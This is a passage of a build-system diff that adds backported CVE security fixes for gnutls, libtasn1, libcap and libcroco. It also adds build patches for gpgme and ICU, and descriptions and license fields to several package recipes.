++ * fields except the decryption result.
++ */
++ session->key.key.size = 2 + GNUTLS_MASTER_SIZE + 2 + pwd_psk.size;
++ session->key.key.data = gnutls_malloc(session->key.key.size);
++ if (session->key.key.data == NULL) {
+ gnutls_assert();
++ _gnutls_free_key_datum(&pwd_psk);
++ /* No need to zeroize, as the secret is not copied in yet */
++ _gnutls_free_datum(&session->key.key);
+ return GNUTLS_E_MEMORY_ERROR;
+ }
+- premaster_secret.size = GNUTLS_MASTER_SIZE;
+
+ /* Fallback value when decryption fails. Needs to be unpredictable. */
+- ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
+- premaster_secret.size);
++ ret = gnutls_rnd(GNUTLS_RND_NONCE, session->key.key.data + 2,
++ GNUTLS_MASTER_SIZE);
+ if (ret < 0) {
+ gnutls_assert();
+- goto cleanup;
++ _gnutls_free_key_datum(&pwd_psk);
++ /* No need to zeroize, as the secret is not copied in yet */
++ _gnutls_free_datum(&session->key.key);
++ return ret;
+ }
+
++ _gnutls_write_uint16(GNUTLS_MASTER_SIZE, session->key.key.data);
++ _gnutls_write_uint16(pwd_psk.size,
++ &session->key.key.data[2 + GNUTLS_MASTER_SIZE]);
++ memcpy(&session->key.key.data[2 + GNUTLS_MASTER_SIZE + 2], pwd_psk.data,
++ pwd_psk.size);
++ _gnutls_free_key_datum(&pwd_psk);
++
+ gnutls_privkey_decrypt_data2(session->internals.selected_key, 0,
+- &ciphertext, premaster_secret.data,
+- premaster_secret.size);
++ &ciphertext, session->key.key.data + 2,
++ GNUTLS_MASTER_SIZE);
+ /* After this point, any conditional on failure that cause differences
+ * in execution may create a timing or cache access pattern side
+ * channel that can be used as an oracle, so tread carefully */
+@@ -365,31 +388,10 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
+ /* This is here to avoid the version check attack
+ * discussed above.
+ */
+- premaster_secret.data[0] = ver_maj;
+- premaster_secret.data[1] = ver_min;
++ session->key.key.data[2] = ver_maj;
++ session->key.key.data[3] = ver_min;
+
+- /* find the key of this username
+- */
+- ret =
+- _gnutls_psk_pwd_find_entry(session, info->username, strlen(info->username), &pwd_psk);
+- if (ret < 0) {
+- gnutls_assert();
+- goto cleanup;
+- }
+-
+- ret =
+- set_rsa_psk_session_key(session, &pwd_psk, &premaster_secret);
+- if (ret < 0) {
+- gnutls_assert();
+- goto cleanup;
+- }
+-
+- ret = 0;
+- cleanup:
+- _gnutls_free_key_datum(&pwd_psk);
+- _gnutls_free_temp_key_datum(&premaster_secret);
+-
+- return ret;
++ return 0;
+ }
+
+ static int
+--
+2.25.1
+
diff --git a/meta/recipes-support/gnutls/gnutls_3.6.14.bb b/meta/recipes-support/gnutls/gnutls_3.6.14.bb
index 51578b4b3b..a1451daf2c 100644
--- a/meta/recipes-support/gnutls/gnutls_3.6.14.bb
+++ b/meta/recipes-support/gnutls/gnutls_3.6.14.bb
@@ -1,5 +1,7 @@
SUMMARY = "GNU Transport Layer Security Library"
-HOMEPAGE = "http://www.gnu.org/software/gnutls/"
+DESCRIPTION = "a secure communications library implementing the SSL, \
+TLS and DTLS protocols and technologies around them."
+HOMEPAGE = "https://gnutls.org/"
BUGTRACKER = "https://savannah.gnu.org/support/?group=gnutls"
LICENSE = "GPLv3+ & LGPLv2.1+"
@@ -21,6 +23,13 @@ SRC_URI = "https://www.gnupg.org/ftp/gcrypt/gnutls/v${SHRT_VER}/gnutls-${PV}.tar
file://arm_eabi.patch \
file://0001-Modied-the-license-to-GPLv2.1-to-keep-with-LICENSE-f.patch \
file://CVE-2020-24659.patch \
+ file://CVE-2021-20231.patch \
+ file://CVE-2021-20232.patch \
+ file://CVE-2022-2509.patch \
+ file://CVE-2021-4209.patch \
+ file://CVE-2023-0361.patch \
+ file://CVE-2023-5981.patch \
+ file://CVE-2024-0553.patch \
"
SRC_URI[sha256sum] = "5630751adec7025b8ef955af4d141d00d252a985769f51b4059e5affa3d39d63"
diff --git a/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch b/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch
new file mode 100644
index 0000000000..9a8ceecbe7
--- /dev/null
+++ b/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch
@@ -0,0 +1,45 @@
+From 22fd12b290adea788122044cb58dc9e77754644f Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Thu, 17 Nov 2022 12:07:50 +0530
+Subject: [PATCH] CVE-2021-46848
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5]
+CVE: CVE-2021-46848
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+Fix ETYPE_OK off by one array size check.
+---
+ NEWS | 4 ++++
+ lib/int.h | 2 +-
+ 2 files changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/NEWS b/NEWS
+index f042481..d8f684e 100644
+--- a/NEWS
++++ b/NEWS
+@@ -1,5 +1,9 @@
+ GNU Libtasn1 NEWS -*- outline -*-
+
++* Noteworthy changes in release ?.? (????-??-??) [?]
++- Fix ETYPE_OK out of bounds read. Closes: #32.
++- Update gnulib files and various maintenance fixes.
++
+ * Noteworthy changes in release 4.16.0 (released 2020-02-01) [stable]
+ - asn1_decode_simple_ber: added support for constructed definite
+ octet strings. This allows this function decode the whole set of
+diff --git a/lib/int.h b/lib/int.h
+index ea16257..c877282 100644
+--- a/lib/int.h
++++ b/lib/int.h
+@@ -97,7 +97,7 @@ typedef struct tag_and_class_st
+ #define ETYPE_TAG(etype) (_asn1_tags[etype].tag)
+ #define ETYPE_CLASS(etype) (_asn1_tags[etype].class)
+ #define ETYPE_OK(etype) (((etype) != ASN1_ETYPE_INVALID && \
+- (etype) <= _asn1_tags_size && \
++ (etype) < _asn1_tags_size && \
+ _asn1_tags[(etype)].desc != NULL)?1:0)
+
+ #define ETYPE_IS_STRING(etype) ((etype == ASN1_ETYPE_GENERALSTRING || \
+--
+2.25.1
+
diff --git a/meta/recipes-support/gnutls/libtasn1_4.16.0.bb b/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
index 8337b70241..d2b3c492ec 100644
--- a/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
+++ b/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
@@ -1,4 +1,6 @@
SUMMARY = "Library for ASN.1 and DER manipulation"
+DESCRIPTION = "A highly portable C library that encodes and decodes \
+DER/BER data following an ASN.1 schema. "
HOMEPAGE = "http://www.gnu.org/software/libtasn1/"
LICENSE = "GPLv3+ & LGPLv2.1+"
@@ -10,6 +12,7 @@ LIC_FILES_CHKSUM = "file://doc/COPYING;md5=d32239bcb673463ab874e80d47fae504 \
SRC_URI = "${GNU_MIRROR}/libtasn1/libtasn1-${PV}.tar.gz \
file://dont-depend-on-help2man.patch \
+ file://CVE-2021-46848.patch \
"
DEPENDS = "bison-native"
diff --git a/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch b/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch
new file mode 100644
index 0000000000..1c46684c6d
--- /dev/null
+++ b/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch
@@ -0,0 +1,24 @@
+From adb1d4e5498a19e9d591ac8f42f9ddfdb23a1354 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Thu, 15 Jul 2021 12:33:13 -0700
+Subject: [PATCH] use closefrom() on linux and glibc 2.34+
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ src/posix-io.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/posix-io.c b/src/posix-io.c
+index e712ef2..ab8ded9 100644
+--- a/src/posix-io.c
++++ b/src/posix-io.c
+@@ -570,7 +570,7 @@ _gpgme_io_spawn (const char *path, char *const argv[], unsigned int flags,
+ if (fd_list[i].fd > fd)
+ fd = fd_list[i].fd;
+ fd++;
+-#if defined(__sun) || defined(__FreeBSD__)
++#if defined(__sun) || defined(__FreeBSD__) || (defined(__GLIBC__) && __GNUC_PREREQ(2, 34))
+ closefrom (fd);
+ max_fds = fd;
+ #else /*!__sun */
diff --git a/meta/recipes-support/gpgme/gpgme_1.13.1.bb b/meta/recipes-support/gpgme/gpgme_1.13.1.bb
index b51534351d..dacc9896e4 100644
--- a/meta/recipes-support/gpgme/gpgme_1.13.1.bb
+++ b/meta/recipes-support/gpgme/gpgme_1.13.1.bb
@@ -20,7 +20,8 @@ SRC_URI = "${GNUPG_MIRROR}/gpgme/${BP}.tar.bz2 \
file://0006-fix-build-path-issue.patch \
file://0007-python-Add-variables-to-tests.patch \
file://0008-do-not-auto-check-var-PYTHON.patch \
- "
+ file://0001-use-closefrom-on-linux-and-glibc-2.34.patch \
+ "
SRC_URI[md5sum] = "198f0a908ec3cd8f0ce9a4f3a4489645"
SRC_URI[sha256sum] = "c4e30b227682374c23cddc7fdb9324a99694d907e79242a25a4deeedb393be46"
@@ -49,7 +50,7 @@ DEFAULT_LANGUAGES_class-target = "cpp"
LANGUAGES ?= "${DEFAULT_LANGUAGES} python"
PYTHON_INHERIT = "${@bb.utils.contains('PACKAGECONFIG', 'python2', 'pythonnative', '', d)}"
-PYTHON_INHERIT .= "${@bb.utils.contains('PACKAGECONFIG', 'python3', 'python3native', '', d)}"
+PYTHON_INHERIT .= "${@bb.utils.contains('PACKAGECONFIG', 'python3', 'python3native python3targetconfig', '', d)}"
EXTRA_OECONF += '--enable-languages="${LANGUAGES}" \
--disable-gpgconf-test \
diff --git a/meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch b/meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch
new file mode 100644
index 0000000000..d7ddf33bce
--- /dev/null
+++ b/meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch
@@ -0,0 +1,24 @@
+From f2bc064e0d70ac068de4539d069bfab6cdccc48d Mon Sep 17 00:00:00 2001
+From: "Shane F. Carr" <shane@unicode.org>
+Date: Fri, 10 Jul 2020 14:28:22 -0500
+Subject: [PATCH] ICU-21175 Add cnvalias as a dependency of misc_res
+
+Upstream-Status: Backport [https://github.com/unicode-org/icu/commit/ee2d8b01034c3101de2bd58f9328daa076995e9e]
+Signed-off-by: Martin Jansa <Martin.Jansa@gmail.com>
+---
+ data/BUILDRULES.py | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/data/BUILDRULES.py b/data/BUILDRULES.py
+index 2338afd1f7..63b6e09273 100644
+--- a/data/BUILDRULES.py
++++ b/data/BUILDRULES.py
+@@ -361,7 +361,7 @@ def generate_misc(config, io, common_vars):
+ RepeatedExecutionRequest(
+ name = "misc_res",
+ category = "misc",
+- dep_targets = [],
++ dep_targets = [DepTarget("cnvalias")], # ICU-21175
+ input_files = input_files,
+ output_files = output_files,
+ tool = IcuTool("genrb"),
diff --git a/meta/recipes-support/icu/icu_66.1.bb b/meta/recipes-support/icu/icu_66.1.bb
index 08254648e4..6ba88595df 100644
--- a/meta/recipes-support/icu/icu_66.1.bb
+++ b/meta/recipes-support/icu/icu_66.1.bb
@@ -21,10 +21,11 @@ BASE_SRC_URI = "https://github.com/unicode-org/icu/releases/download/release-${I
DATA_SRC_URI = "https://github.com/unicode-org/icu/releases/download/release-${ICU_FOLDER}/icu4c-${ICU_PV}-data.zip"
SRC_URI = "${BASE_SRC_URI};name=code \
${DATA_SRC_URI};name=data \
+ file://0001-Fix-big-endian-build.patch;patchdir=${WORKDIR} \
+ file://0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch;patchdir=${WORKDIR} \
file://filter.json \
file://icu-pkgdata-large-cmd.patch \
file://fix-install-manx.patch \
- file://0001-Fix-big-endian-build.patch;apply=no \
file://0001-icu-Added-armeb-support.patch \
file://CVE-2020-10531.patch \
"
@@ -47,7 +48,6 @@ do_make_icudata_class-target () {
cd ${S}
rm -rf data
cp -a ${WORKDIR}/data .
- patch -p1 < ${WORKDIR}/0001-Fix-big-endian-build.patch
${@bb.utils.contains('PACKAGECONFIG', 'make-icudata', '', 'exit 0', d)}
AR='${BUILD_AR}' \
CC='${BUILD_CC}' \
diff --git a/meta/recipes-support/iso-codes/iso-codes_4.4.bb b/meta/recipes-support/iso-codes/iso-codes_4.4.bb
index 4767dea84c..e8210eca9b 100644
--- a/meta/recipes-support/iso-codes/iso-codes_4.4.bb
+++ b/meta/recipes-support/iso-codes/iso-codes_4.4.bb
@@ -1,11 +1,14 @@
SUMMARY = "ISO language, territory, currency, script codes and their translations"
+DESCRIPTION = "Provides lists of various ISO standards (e.g. country, \
+language, language scripts, and currency names) in one place, rather \
+than repeated in many programs throughout the system."
HOMEPAGE = "https://salsa.debian.org/iso-codes-team/iso-codes"
BUGTRACKER = "https://salsa.debian.org/iso-codes-team/iso-codes/issues"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://salsa.debian.org/iso-codes-team/iso-codes.git;protocol=http;branch=main;"
+SRC_URI = "git://salsa.debian.org/iso-codes-team/iso-codes.git;protocol=https;branch=main;"
SRCREV = "38edb926592954b87eb527124da0ec68d2a748f3"
# inherit gettext cannot be used, because it adds gettext-native to BASEDEPENDS which
diff --git a/meta/recipes-support/itstool/itstool_2.0.6.bb b/meta/recipes-support/itstool/itstool_2.0.6.bb
index 5f358f463d..54105af5f0 100644
--- a/meta/recipes-support/itstool/itstool_2.0.6.bb
+++ b/meta/recipes-support/itstool/itstool_2.0.6.bb
@@ -1,4 +1,8 @@
SUMMARY = "ITS Tool allows you to translate your XML documents with PO files"
+DESCRIPTION = "It extracts messages from XML files and outputs PO template \
+files, then merges translations from MO files to create translated \
+XML files. It determines what to translate and how to chunk it into \
+messages using the W3C Internationalization Tag Set (ITS). "
HOMEPAGE = "http://itstool.org/"
LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=59c57b95fd7d0e9e238ebbc7ad47c5a5"
diff --git a/meta/recipes-support/libassuan/libassuan_2.5.3.bb b/meta/recipes-support/libassuan/libassuan_2.5.3.bb
index 52b4c0f1b9..9ef5074120 100644
--- a/meta/recipes-support/libassuan/libassuan_2.5.3.bb
+++ b/meta/recipes-support/libassuan/libassuan_2.5.3.bb
@@ -1,4 +1,7 @@
SUMMARY = "IPC library used by GnuPG and GPGME"
+DESCRIPTION = "A small library implementing the so-called Assuan protocol. \
+This protocol is used for IPC between most newer GnuPG components. \
+Both, server and client side functions are provided. "
HOMEPAGE = "http://www.gnupg.org/related_software/libassuan/"
BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
diff --git a/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb b/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
index 7628eedb1b..3089d1f7ff 100644
--- a/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
+++ b/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
@@ -1,4 +1,5 @@
SUMMARY = "A library for atomic integer operations"
+DESCRIPTION = "Package provides semi-portable access to hardware-provided atomic memory update operations on a number of architectures."
HOMEPAGE = "https://github.com/ivmai/libatomic_ops/"
SECTION = "optional"
PROVIDES += "libatomics-ops"
diff --git a/meta/recipes-support/libbsd/libbsd_0.10.0.bb b/meta/recipes-support/libbsd/libbsd_0.10.0.bb
index 5b32b9af41..58925738cb 100644
--- a/meta/recipes-support/libbsd/libbsd_0.10.0.bb
+++ b/meta/recipes-support/libbsd/libbsd_0.10.0.bb
@@ -29,6 +29,12 @@ HOMEPAGE = "https://libbsd.freedesktop.org/wiki/"
# License: public-domain-Colin-Plumb
LICENSE = "BSD-3-Clause & BSD-4-Clause & ISC & PD"
LICENSE_${PN} = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-dbg = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-dev = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-doc = "BSD-3-Clause & BSD-4-Clause & ISC & PD"
+LICENSE:${PN}-locale = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-src = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-staticdev = "BSD-3-Clause & ISC & PD"
LIC_FILES_CHKSUM = "file://COPYING;md5=2120be0173469a06ed185b688e0e1ae0"
SECTION = "libs"
diff --git a/meta/recipes-support/libcap/files/CVE-2023-2602.patch b/meta/recipes-support/libcap/files/CVE-2023-2602.patch
new file mode 100644
index 0000000000..ca04d7297a
--- /dev/null
+++ b/meta/recipes-support/libcap/files/CVE-2023-2602.patch
@@ -0,0 +1,52 @@
+Backport of:
+
+From bc6b36682f188020ee4770fae1d41bde5b2c97bb Mon Sep 17 00:00:00 2001
+From: "Andrew G. Morgan" <morgan@kernel.org>
+Date: Wed, 3 May 2023 19:18:36 -0700
+Subject: Correct the check of pthread_create()'s return value.
+
+This function returns a positive number (errno) on error, so the code
+wasn't previously freeing some memory in this situation.
+
+Discussion:
+
+ https://stackoverflow.com/a/3581020/14760867
+
+Credit for finding this bug in libpsx goes to David Gstir of
+X41 D-Sec GmbH (https://x41-dsec.de/) who performed a security
+audit of the libcap source code in April of 2023. The audit
+was sponsored by the Open Source Technology Improvement Fund
+(https://ostif.org/).
+
+Audit ref: LCAP-CR-23-01 (CVE-2023-2602)
+
+Signed-off-by: Andrew G. Morgan <morgan@kernel.org>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libcap2/tree/debian/patches/CVE-2023-2602.patch?h=ubuntu/focal-security
+Upstream commit https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=bc6b36682f188020ee4770fae1d41bde5b2c97bb]
+CVE: CVE-2023-2602
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ psx/psx.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/libcap/psx.c
++++ b/libcap/psx.c
+@@ -272,7 +272,7 @@ int psx_pthread_create(pthread_t *thread
+
+ psx_wait_for_idle();
+ int ret = pthread_create(thread, attr, start_routine, arg);
+- if (ret != -1) {
++ if (ret == 0) {
+ psx_do_registration(*thread);
+ }
+ psx_resume_idle();
+@@ -287,7 +287,7 @@ int __wrap_pthread_create(pthread_t *thr
+ void *(*start_routine) (void *), void *arg) {
+ psx_wait_for_idle();
+ int ret = __real_pthread_create(thread, attr, start_routine, arg);
+- if (ret != -1) {
++ if (ret == 0) {
+ psx_do_registration(*thread);
+ }
+ psx_resume_idle();
diff --git a/meta/recipes-support/libcap/files/CVE-2023-2603.patch b/meta/recipes-support/libcap/files/CVE-2023-2603.patch
new file mode 100644
index 0000000000..cf86ac2a46
--- /dev/null
+++ b/meta/recipes-support/libcap/files/CVE-2023-2603.patch
@@ -0,0 +1,58 @@
+Backport of:
+
+From 422bec25ae4a1ab03fd4d6f728695ed279173b18 Mon Sep 17 00:00:00 2001
+From: "Andrew G. Morgan" <morgan@kernel.org>
+Date: Wed, 3 May 2023 19:44:22 -0700
+Subject: Large strings can confuse libcap's internal strdup code.
+
+Avoid something subtle with really long strings: 1073741823 should
+be enough for anybody. This is an improved fix over something attempted
+in libcap-2.55 to address some static analysis findings.
+
+Reviewing the library, cap_proc_root() and cap_launcher_set_chroot()
+are the only two calls where the library is potentially exposed to a
+user controlled string input.
+
+Credit for finding this bug in libcap goes to Richard Weinberger of
+X41 D-Sec GmbH (https://x41-dsec.de/) who performed a security audit
+of the libcap source code in April of 2023. The audit was sponsored
+by the Open Source Technology Improvement Fund (https://ostif.org/).
+
+Audit ref: LCAP-CR-23-02 (CVE-2023-2603)
+
+Signed-off-by: Andrew G. Morgan <morgan@kernel.org>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libcap2/tree/debian/patches/CVE-2023-2603.patch?h=ubuntu/focal-security
+Upstream commit https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=422bec25ae4a1ab03fd4d6f728695ed279173b18]
+CVE: CVE-2023-2603
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libcap/cap_alloc.c | 12 +++++++-----
+ 1 file changed, 7 insertions(+), 5 deletions(-)
+
+--- a/libcap/cap_alloc.c
++++ b/libcap/cap_alloc.c
+@@ -76,13 +76,22 @@ cap_t cap_init(void)
+ char *_libcap_strdup(const char *old)
+ {
+ __u32 *raw_data;
++ size_t len;
+
+ if (old == NULL) {
+ errno = EINVAL;
+ return NULL;
+ }
+
+- raw_data = malloc( sizeof(__u32) + strlen(old) + 1 );
++ len = strlen(old);
++ if ((len & 0x3fffffff) != len) {
++ _cap_debug("len is too long for libcap to manage");
++ errno = EINVAL;
++ return NULL;
++ }
++ len += sizeof(__u32) + 1;
++
++ raw_data = malloc(len);
+ if (raw_data == NULL) {
+ errno = ENOMEM;
+ return NULL;
diff --git a/meta/recipes-support/libcap/libcap_2.32.bb b/meta/recipes-support/libcap/libcap_2.32.bb
index d78a58f7d2..64d5190aa7 100644
--- a/meta/recipes-support/libcap/libcap_2.32.bb
+++ b/meta/recipes-support/libcap/libcap_2.32.bb
@@ -1,8 +1,10 @@
SUMMARY = "Library for getting/setting POSIX.1e capabilities"
+DESCRIPTION = "A library providing the API to access POSIX capabilities. \
+These allow giving various kinds of specific privileges to individual \
+users, without giving them full root permissions."
HOMEPAGE = "http://sites.google.com/site/fullycapable/"
-
# no specific GPL version required
-LICENSE = "BSD | GPLv2"
+LICENSE = "BSD-3-Clause | GPLv2"
LIC_FILES_CHKSUM = "file://License;md5=3f84fd6f29d453a56514cb7e4ead25f1"
DEPENDS = "hostperl-runtime-native gperf-native"
@@ -11,6 +13,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/libs/security/linux-privs/${BPN}2/${BPN}-${
file://0001-ensure-the-XATTR_NAME_CAPS-is-defined-when-it-is-use.patch \
file://0002-tests-do-not-run-target-executables.patch \
file://0001-tests-do-not-statically-link-a-test.patch \
+ file://CVE-2023-2602.patch \
+ file://CVE-2023-2603.patch \
"
SRC_URI[md5sum] = "7416119c9fdcfd0e8dd190a432c668e9"
SRC_URI[sha256sum] = "1005e3d227f2340ad1e3360ef8b69d15e3c72a29c09f4894d7aac038bd26e2be"
diff --git a/meta/recipes-support/libcheck/libcheck_0.14.0.bb b/meta/recipes-support/libcheck/libcheck_0.14.0.bb
index a88f009cdb..57963d83d4 100644
--- a/meta/recipes-support/libcheck/libcheck_0.14.0.bb
+++ b/meta/recipes-support/libcheck/libcheck_0.14.0.bb
@@ -1,4 +1,9 @@
SUMMARY = "Check - unit testing framework for C code"
+DESCRIPTION = "It features a simple interface for defining unit tests, \
+putting little in the way of the developer. Tests are run in a separate \
+address space, so both assertion failures and code errors that cause \
+segmentation faults or other signals can be caught. Test results are \
+reportable in the following: Subunit, TAP, XML, and a generic logging format."
HOMEPAGE = "https://libcheck.github.io/check/"
SECTION = "devel"
diff --git a/meta/recipes-support/libcroco/files/CVE-2020-12825.patch b/meta/recipes-support/libcroco/files/CVE-2020-12825.patch
new file mode 100644
index 0000000000..42f92e3607
--- /dev/null
+++ b/meta/recipes-support/libcroco/files/CVE-2020-12825.patch
@@ -0,0 +1,192 @@
+From fdf78a4877afa987ba646a8779b513f258e6d04c Mon Sep 17 00:00:00 2001
+From: Michael Catanzaro <mcatanzaro@gnome.org>
+Date: Fri, 31 Jul 2020 15:21:53 -0500
+Subject: [PATCH] libcroco: Limit recursion in block and any productions
+
+ (CVE-2020-12825)
+
+If we don't have any limits, we can recurse forever and overflow the
+stack.
+
+Fixes #8
+This is per https://gitlab.gnome.org/Archive/libcroco/-/issues/8
+
+https://gitlab.gnome.org/GNOME/gnome-shell/-/merge_requests/1404
+
+CVE: CVE-2020-12825
+Upstream-Status: Backport [https://gitlab.gnome.org/Archive/libcroco/-/commit/6eb257e5c731c691eb137fca94e916ca73941a5a]
+Comment: No refreshing changes done.
+Signed-off-by: Saloni Jain <Saloni.Jain@kpit.com>
+
+---
+ src/cr-parser.c | 44 +++++++++++++++++++++++++++++---------------
+ 1 file changed, 29 insertions(+), 15 deletions(-)
+
+diff --git a/src/cr-parser.c b/src/cr-parser.c
+index 18c9a01..f4a62e3 100644
+--- a/src/cr-parser.c
++++ b/src/cr-parser.c
+@@ -136,6 +136,8 @@ struct _CRParserPriv {
+
+ #define CHARS_TAB_SIZE 12
+
++#define RECURSIVE_CALLERS_LIMIT 100
++
+ /**
+ * IS_NUM:
+ *@a_char: the char to test.
+@@ -344,9 +346,11 @@ static enum CRStatus cr_parser_parse_selector_core (CRParser * a_this);
+
+ static enum CRStatus cr_parser_parse_declaration_core (CRParser * a_this);
+
+-static enum CRStatus cr_parser_parse_any_core (CRParser * a_this);
++static enum CRStatus cr_parser_parse_any_core (CRParser * a_this,
++ guint n_calls);
+
+-static enum CRStatus cr_parser_parse_block_core (CRParser * a_this);
++static enum CRStatus cr_parser_parse_block_core (CRParser * a_this,
++ guint n_calls);
+
+ static enum CRStatus cr_parser_parse_value_core (CRParser * a_this);
+
+@@ -784,7 +788,7 @@ cr_parser_parse_atrule_core (CRParser * a_this)
+ cr_parser_try_to_skip_spaces_and_comments (a_this);
+
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, 0);
+ } while (status == CR_OK);
+
+ status = cr_tknzr_get_next_token (PRIVATE (a_this)->tknzr,
+@@ -795,7 +799,7 @@ cr_parser_parse_atrule_core (CRParser * a_this)
+ cr_tknzr_unget_token (PRIVATE (a_this)->tknzr,
+ token);
+ token = NULL;
+- status = cr_parser_parse_block_core (a_this);
++ status = cr_parser_parse_block_core (a_this, 0);
+ CHECK_PARSING_STATUS (status,
+ FALSE);
+ goto done;
+@@ -930,11 +934,11 @@ cr_parser_parse_selector_core (CRParser * a_this)
+
+ RECORD_INITIAL_POS (a_this, &init_pos);
+
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, 0);
+ CHECK_PARSING_STATUS (status, FALSE);
+
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, 0);
+
+ } while (status == CR_OK);
+
+@@ -956,10 +960,12 @@ cr_parser_parse_selector_core (CRParser * a_this)
+ *in chapter 4.1 of the css2 spec.
+ *block ::= '{' S* [ any | block | ATKEYWORD S* | ';' ]* '}' S*;
+ *@param a_this the current instance of #CRParser.
++ *@param n_calls used to limit recursion depth
+ *FIXME: code this function.
+ */
+ static enum CRStatus
+-cr_parser_parse_block_core (CRParser * a_this)
++cr_parser_parse_block_core (CRParser * a_this,
++ guint n_calls)
+ {
+ CRToken *token = NULL;
+ CRInputPos init_pos;
+@@ -967,6 +973,9 @@ cr_parser_parse_block_core (CRParser * a_this)
+
+ g_return_val_if_fail (a_this && PRIVATE (a_this), CR_BAD_PARAM_ERROR);
+
++ if (n_calls > RECURSIVE_CALLERS_LIMIT)
++ return CR_ERROR;
++
+ RECORD_INITIAL_POS (a_this, &init_pos);
+
+ status = cr_tknzr_get_next_token (PRIVATE (a_this)->tknzr, &token);
+@@ -996,13 +1005,13 @@ cr_parser_parse_block_core (CRParser * a_this)
+ } else if (token->type == CBO_TK) {
+ cr_tknzr_unget_token (PRIVATE (a_this)->tknzr, token);
+ token = NULL;
+- status = cr_parser_parse_block_core (a_this);
++ status = cr_parser_parse_block_core (a_this, n_calls + 1);
+ CHECK_PARSING_STATUS (status, FALSE);
+ goto parse_block_content;
+ } else {
+ cr_tknzr_unget_token (PRIVATE (a_this)->tknzr, token);
+ token = NULL;
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, n_calls + 1);
+ CHECK_PARSING_STATUS (status, FALSE);
+ goto parse_block_content;
+ }
+@@ -1109,7 +1118,7 @@ cr_parser_parse_value_core (CRParser * a_this)
+ status = cr_tknzr_unget_token (PRIVATE (a_this)->tknzr,
+ token);
+ token = NULL;
+- status = cr_parser_parse_block_core (a_this);
++ status = cr_parser_parse_block_core (a_this, 0);
+ CHECK_PARSING_STATUS (status, FALSE);
+ ref++;
+ goto continue_parsing;
+@@ -1123,7 +1132,7 @@ cr_parser_parse_value_core (CRParser * a_this)
+ status = cr_tknzr_unget_token (PRIVATE (a_this)->tknzr,
+ token);
+ token = NULL;
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, 0);
+ if (status == CR_OK) {
+ ref++;
+ goto continue_parsing;
+@@ -1162,10 +1171,12 @@ cr_parser_parse_value_core (CRParser * a_this)
+ * | FUNCTION | DASHMATCH | '(' any* ')' | '[' any* ']' ] S*;
+ *
+ *@param a_this the current instance of #CRParser.
++ *@param n_calls used to limit recursion depth
+ *@return CR_OK upon successfull completion, an error code otherwise.
+ */
+ static enum CRStatus
+-cr_parser_parse_any_core (CRParser * a_this)
++cr_parser_parse_any_core (CRParser * a_this,
++ guint n_calls)
+ {
+ CRToken *token1 = NULL,
+ *token2 = NULL;
+@@ -1174,6 +1185,9 @@ cr_parser_parse_any_core (CRParser * a_this)
+
+ g_return_val_if_fail (a_this, CR_BAD_PARAM_ERROR);
+
++ if (n_calls > RECURSIVE_CALLERS_LIMIT)
++ return CR_ERROR;
++
+ RECORD_INITIAL_POS (a_this, &init_pos);
+
+ status = cr_tknzr_get_next_token (PRIVATE (a_this)->tknzr, &token1);
